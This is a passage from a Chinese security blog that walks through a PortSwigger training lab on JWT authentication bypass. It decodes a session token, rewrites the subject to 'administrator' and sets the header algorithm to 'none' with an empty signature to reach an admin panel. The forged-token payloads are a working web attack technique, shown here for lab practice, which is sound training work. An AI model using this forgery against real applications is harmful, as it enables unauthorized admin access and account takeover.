某不知名博客 某不知名博客
首页
  • 《vulcat文档》
  • Web安全

    • 《BurpSuite及官方实验室》
    • 《OSWE学习历程》
  • 云原生安全

    • 《Docker命令大全》
    • 《CKS考试学习指南》
    • 《旧-Kubernetes教程》
漏洞库
  • 《渗透工具大全》
  • 《云安全》
事件库
关于
  • 分类
  • 标签
  • 归档
GitHub (opens new window)

Carsaid

安全界的小学生
首页
  • 《vulcat文档》
  • Web安全

    • 《BurpSuite及官方实验室》
    • 《OSWE学习历程》
  • 云原生安全

    • 《Docker命令大全》
    • 《CKS考试学习指南》
    • 《旧-Kubernetes教程》
漏洞库
  • 《渗透工具大全》
  • 《云安全》
事件库
关于
  • 分类
  • 标签
  • 归档
GitHub (opens new window)
  • 前言

  • 服务器端主题(翻译)

  • 客户端主题(翻译)

  • 高级主题(翻译)

  • 扩展阅读(翻译)

  • 个人学习笔记

  • 实验室做题记录

    • 实验室做题记录
    • 服务器端

    • 客户端

    • 高级主题

      • 不安全的反序列化

      • GraphQL API漏洞

      • 服务端模板注入

      • Web缓存投毒

      • HTTP主机头攻击

      • HTTP请求走私

      • OAuth身份验证漏洞

      • JWT攻击

        • 学徒-绕过JWT身份验证-接受任意签名
        • 学徒-绕过JWT身份验证-接受没有签名的令牌
          • 题目
          • 实操
            • 解码原始令牌
            • 信息修改测试
            • 标头修改-空签名
        • 从业者-密钥暴力破解
        • 从业者-jwk标头注入
        • 从业者-jku标头注入
        • 从业者-kid标头路径遍历
        • 专家-算法混淆攻击
        • 专家-算法混淆攻击-无公开的密钥
      • 原型链污染

  • BurpSuite及官方实验室
  • 实验室做题记录
  • 高级主题
  • JWT攻击
carsaid
2024-02-17
目录

学徒-绕过JWT身份验证-接受没有签名的令牌

# 实验室:通过有缺陷的签名验证绕过JWT身份验证

# 题目

此实验室使用基于 JWT 的机制来处理会话。服务器被不安全地配置,可以接受无签名的 JWTs。

若要解决实验室问题,请修改你的会话令牌,访问位于/admin的管理面板并删除carlos用户。

你可以使用以下凭据登录到自己的帐户:wiener:peter。

提示

在尝试此实验之前,我们建议你先熟悉一下如何在 BurpSuite 中使用 JWTs (opens new window)。

实验室-学徒

通过有缺陷的签名验证绕过JWT身份验证 >>

- name: 实验室-学徒
  desc: 通过有缺陷的签名验证绕过JWT身份验证 >>
  avatar: https://fastly.statically.io/gh/clincat/blog-imgs@main/vuepress/static/imgs/docs/burpsuite-learn/public/lab-logo.png
  link: https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-flawed-signature-verification
  bgColor: '#001350'
  textColor: '#39d50c'
1
2
3
4
5
6

# 实操

(目前只有图,文字后面有时间补)

点击 “ACCESS THE LAB” 进入实验室。

Not Found Image Not Found Image Not Found Image

# 解码原始令牌

eyJraWQiOiI0MGMwYmZmMy04NTNhLTRhNTEtOTZhNS03NjA4NTFhZTMzZDIiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTcwODE2MzY5Niwic3ViIjoid2llbmVyIn0.VDzHjzVutYo62hM_R1wITC1KX-AcVXDEucsDk_NjHDyXhV-fsN7x7aqkrFFfFb-JgCH7Pgu3Ig0b9RUbp-Ca1Hb3TV9NegjNUgCoVAI1GcjplJ2vp8ZuBnQO8VTFqQodUcwukS97wNv5phQ41foKwt1no21Glbj0c-ZZoidYreFZkhk2rt03NcQhZS3k13Pzth8GhidoGarWCb28cfWnKTpK4yK32nzYyVg_tLsQsb7zSH1RobQuTGmUMI6Q9ChzdY04kH8_bV3K8H56DK11s4It8Kv2cSqysvSV9ZImNyMGwnPdaR2m1iAITUTSTAF5aO0rMaCXQl6QIiaKlADm9w
1
{"kid":"40c0bff3-853a-4a51-96a5-760851ae33d2","alg":"RS256"}

{"iss":"portswigger","exp":1708163696,"sub":"wiener"}

// 签名:<原始签名>
1
2
3
4
5
Not Found Image Not Found Image

# 信息修改测试

{"kid":"40c0bff3-853a-4a51-96a5-760851ae33d2","alg":"RS256"}

{"iss":"portswigger","exp":1708163696,"sub":"administrator"}

// 签名:<原始签名>
1
2
3
4
5
Not Found Image

# 标头修改-空签名

{"kid":"40c0bff3-853a-4a51-96a5-760851ae33d2","alg":"none"}

{"iss":"portswigger","exp":1708163696,"sub":"administrator"}

// 签名:空
1
2
3
4
5
Not Found Image Not Found Image Not Found Image Not Found Image
编辑 (opens new window)
学徒-绕过JWT身份验证-接受任意签名
从业者-密钥暴力破解

← 学徒-绕过JWT身份验证-接受任意签名 从业者-密钥暴力破解→

最近更新
01
API测试笔记
04-30
02
msfvenom
03-29
03
Metasploit
03-29
更多文章>
Theme by Vdoing | Copyright © 2023-2024 Carsaid | MIT License
  • 跟随系统
  • 浅色模式
  • 深色模式
  • 阅读模式